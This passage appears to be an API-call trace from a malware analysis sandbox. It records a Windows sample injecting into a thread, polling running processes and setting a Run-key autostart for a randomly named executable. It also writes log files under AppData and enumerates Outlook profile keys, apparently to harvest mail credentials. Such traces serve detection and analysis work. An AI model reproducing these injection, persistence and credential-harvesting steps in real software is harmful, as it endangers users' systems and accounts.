[399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0078.592] NtQueueApcThread (ThreadHandle=0xa0, ApcRoutine=0x64a4b8c, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0078.596] NtResumeThread (in: ThreadHandle=0xa0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0078.596] NtClose (Handle=0x9c) returned 0x0 [0078.596] NtClose (Handle=0xa0) returned 0x0 [0078.600] PostThreadMessageW (idThread=0x614, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0078.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x1f0000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0078.762] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0083.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x1f0000, RegionSize=0x24e818*=0x10000) returned 0x0 [0083.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1f0000, ResultLength=0x0) returned 0x0 [0083.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x1f0000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0083.836] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0088.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x1f0000, RegionSize=0x24e818*=0x10000) returned 0x0 [0088.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1f0000, ResultLength=0x0) returned 0x0 [0088.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x1f0000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0088.919] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0093.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x1f0000, RegionSize=0x24e818*=0x10000) returned 0x0 [0093.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1f0000, ResultLength=0x0) returned 0x0 [0093.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x1f0000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0093.957] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0098.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x1f0000, RegionSize=0x24e818*=0x10000) returned 0x0 [0098.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1f0000, ResultLength=0x0) returned 0x0 [0099.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x1f0000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0099.038] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0104.063] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x24e800 | out: TokenHandle=0x24e800*=0x5c) returned 0x0 [0104.063] NtQueryInformationToken (in: TokenHandle=0x5c, TokenInformationClass=0x14, TokenInformation=0x24e7f8, TokenInformationLength=0x4, ReturnLength=0x24e7fc | out: TokenInformation=0x24e7f8, ReturnLength=0x24e7fc) returned 0x0 [0104.063] NtClose (Handle=0x5c) returned 0x0 [0104.063] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0104.063] NtCreateFile (in: FileHandle=0x24e7f0, DesiredAccess=0x12019f, ObjectAttributes=0x24e7b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e7f0*=0xffffffff, IoStatusBlock=0x24e7d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0104.063] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7c0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0104.063] NtCreateFile (in: FileHandle=0x24e7e0, DesiredAccess=0x120089, ObjectAttributes=0x24e7a8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7c8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e7e0*=0xffffffff, IoStatusBlock=0x24e7c8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0104.063] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x24e3d0 | out: TokenHandle=0x24e3d0*=0x5c) returned 0x0 [0104.063] NtQueryInformationToken (in: TokenHandle=0x5c, TokenInformationClass=0x1, TokenInformation=0x24dbc8, TokenInformationLength=0x400, ReturnLength=0x24e3c8 | out: TokenInformation=0x24dbc8, ReturnLength=0x24e3c8) returned 0x0 [0104.063] ConvertSidToStringSidW () returned 0x1 [0104.063] NtClose (Handle=0x5c) returned 0x0 [0106.029] NtCreateKey (in: KeyHandle=0x24e808, DesiredAccess=0x2021f, ObjectAttributes=0x24e3cc*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e808*=0x5c) returned 0x0 [0106.697] NtSetValueKey (in: KeyHandle=0x5c, ValueName="VFIL_RNHERNX", TitleIndex=0x0, Type=0x1, Data="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", DataSize=0x4a | out: Data="C:\\Program Files\\Crfitq6x\\gdigzvh.exe") returned 0x0 [0106.698] NtClose (Handle=0x5c) returned 0x0 [0106.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7d4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.698] NtCreateFile (in: FileHandle=0x24e7f4, DesiredAccess=0x12019f, ObjectAttributes=0x24e7bc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7dc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e7f4*=0xffffffff, IoStatusBlock=0x24e7dc*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0106.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7c4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.698] NtCreateFile (in: FileHandle=0x24e7e4, DesiredAccess=0x120089, ObjectAttributes=0x24e7ac*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7cc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e7e4*=0xffffffff, IoStatusBlock=0x24e7cc*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0106.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-", NtPathName=0x24e7e4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.698] NtCreateFile (in: FileHandle=0x24e804, DesiredAccess=0x100181, ObjectAttributes=0x24e7cc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7ec, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x21, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e804*=0x5c, IoStatusBlock=0x24e7ec*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0106.756] NtQueryInformationFile (in: FileHandle=0x5c, IoStatusBlock=0x24e7ec, FileInformation=0x24e78c, Length=0x28, FileInformationClass=0x4 | out: IoStatusBlock=0x24e7ec, FileInformation=0x24e78c) returned 0x0 [0106.760] NtSetInformationFile (FileHandle=0x5c, IoStatusBlock=0x24e7ec, FileInformation=0x24e78c, Length=0x28, FileInformationClass=0x4) returned 0x0 [0106.761] NtClose (Handle=0x5c) returned 0x0 [0106.761] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlog.ini", NtPathName=0x24e7d4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlog.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.761] NtCreateFile (in: FileHandle=0x24e7f4, DesiredAccess=0x12019f, ObjectAttributes=0x24e7bc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlog.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7dc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e7f4*=0x5c, IoStatusBlock=0x24e7dc*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0106.773] NtClose (Handle=0x5c) returned 0x0 [0106.773] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x24e16c | out: TokenHandle=0x24e16c*=0x5c) returned 0x0 [0106.773] NtQueryInformationToken (in: TokenHandle=0x5c, TokenInformationClass=0x1, TokenInformation=0x24d964, TokenInformationLength=0x400, ReturnLength=0x24e164 | out: TokenInformation=0x24d964, ReturnLength=0x24e164) returned 0x0 [0106.773] ConvertSidToStringSidW () returned 0x1 [0106.773] NtClose (Handle=0x5c) returned 0x0 [0106.773] NtCreateKey (in: KeyHandle=0x24e7e0, DesiredAccess=0x20219, ObjectAttributes=0x24e168*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e7e0*=0x0) returned 0xc0000034 [0106.773] NtCreateKey (in: KeyHandle=0x24e7e0, DesiredAccess=0x20219, ObjectAttributes=0x24e160*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e7e0*=0x5c) returned 0x0 [0106.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24e058, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.773] NtCreateFile (in: FileHandle=0x24e078, DesiredAccess=0x120089, ObjectAttributes=0x24e040*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e060, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e078*=0xffffffff, IoStatusBlock=0x24e060*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0106.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24e070, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.773] NtCreateFile (in: FileHandle=0x24e090, DesiredAccess=0x12019f, ObjectAttributes=0x24e058*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e078, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e090*=0xa4, IoStatusBlock=0x24e078*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0106.776] NtQueryInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x24e078, FileInformation=0x24dfd0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e078, FileInformation=0x24dfd0) returned 0x0 [0106.781] NtWriteFile (in: FileHandle=0xa4, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24e078, Buffer=0x106960*, Length=0x28, ByteOffset=0x24dfe8*=0, Key=0x0 | out: IoStatusBlock=0x24e078, Buffer=0x106960*) returned 0x0 [0106.782] NtClose (Handle=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.784] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\0413e2ad850e7146953cbb4c2672287e", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.784] NtClose (Handle=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.784] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.784] NtClose (Handle=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.784] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.784] NtClose (Handle=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.784] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\1b5aad0cdb629e49a2c6203d4a6a948a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\1dab3177c2ac33448a4fe54b862a329e", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x5, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\2a7b899b94a04042a46a1cd96dc2a18c", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x6, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x7, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\7a302ee0804dab4ba930ea4351b9b4ac", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x8, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\7df1ae4ad074c146bb02f647b97dd78e", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x9, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.786] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.786] NtClose (Handle=0xa4) returned 0x0 [0106.786] NtEnumerateKey (in: KeyHandle=0x5c, Index=0xa, KeyInformationClass=0x0, 